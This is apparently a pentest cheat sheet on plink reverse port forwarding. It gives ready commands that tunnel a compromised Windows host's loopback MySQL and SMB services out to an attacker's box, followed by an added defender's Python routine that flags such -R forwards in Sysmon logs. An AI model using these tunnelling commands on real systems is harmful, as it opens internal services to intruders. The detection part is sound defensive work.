Port Forwarding with PLINK
Download Plink
You can download the latest plink.exe binary from here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Individual Port Forwarding
- Using plink.exe in SSH mode
- A service on a compromised host is listening on 127.0.0.1
- Open a port on attack box and forward traffic to remote port
Reverse Local Port to Remote Port
Step 1. Establish SSH Tunnel from Remote
[Attack Box] <<=========[SSH]========[+] [Remote]
127.0.0.1:[port]                         127.0.0.1:[port]
    [+]                                   ^
     |____________________________________|
Step 2. Reverse Forward Attack Box Port to Remote
# Example Commands
# ----------------
# Open 127.0.0.1:33060 on Attack Box
# Tunnel to 127.0.0.1:3306 on target
# Password authentication
echo 'y' | .\plink.exe -ssh -l username -pw password -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip
# Private key authentication
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip
# Multiple port forwards
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 -R 127.0.0.1:4445:127.0.0.1:445 attack-box-ip
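For defenders, the `-R` forwards in the commands above are visible in process-creation logging. The following added example (not from the original page) parses the forward specs out of command lines and reports which loopback-only services they expose; the function names, host names and sample events are constructed, with field names following Sysmon Event ID 1.

```python
import re

# -R [bind_addr:]listen_port:dest_host:dest_port (IPv6 literals not handled)
REMOTE_FWD = re.compile(
    r"^(?:(?P<bind>[^:]+):)?(?P<lport>\d+):(?P<dhost>[^:]+):(?P<dport>\d+)$")
LOOPBACK = {"127.0.0.1", "localhost"}

def reverse_forwards(cmdline):
    """Extract every -R forward spec from a command line."""
    tokens = cmdline.split()
    found = []
    for flag, spec in zip(tokens, tokens[1:]):
        m = REMOTE_FWD.match(spec) if flag == "-R" else None
        if m:
            found.append({
                "listen": f"{m['bind'] or '(default)'}:{m['lport']}",
                "target": f"{m['dhost']}:{m['dport']}",
                "loopback_service": m["dhost"].lower() in LOOPBACK,
            })
    return found

def triage(event):
    """Return an alert dict for a process-creation event, or None."""
    forwards = reverse_forwards(event["CommandLine"])
    if not forwards:
        return None
    return {
        "host": event["Host"],
        "image": event["Image"],
        "forwards": forwards,
        "password_on_cmdline": "-pw" in event["CommandLine"].split(),
        "loopback_exposed": any(f["loopback_service"] for f in forwards),
    }

# Constructed sample events (hypothetical hosts; fields as in Sysmon Event ID 1)
EVENTS = [
    {"Host": "WS01", "Image": r"C:\Windows\Temp\plink.exe",
     "CommandLine": r".\plink.exe -ssh -l username -pw password -batch -N "
                    r"-R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip"},
    {"Host": "WS02", "Image": r"C:\Windows\Temp\plink.exe",
     "CommandLine": r".\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem "
                    r"-batch -N -R 127.0.0.1:33060:127.0.0.1:3306 "
                    r"-R 127.0.0.1:4445:127.0.0.1:445 attack-box-ip"},
    {"Host": "WS03", "Image": r"C:\Tools\plink.exe",
     "CommandLine": r"plink.exe -ssh admin@jump01 -batch uptime"},
]

ALERTS = [a for a in map(triage, EVENTS) if a]
```

The third event is an ordinary plink session with no `-R` spec and produces no alert, so the rule keys on the forward itself and not on the binary name.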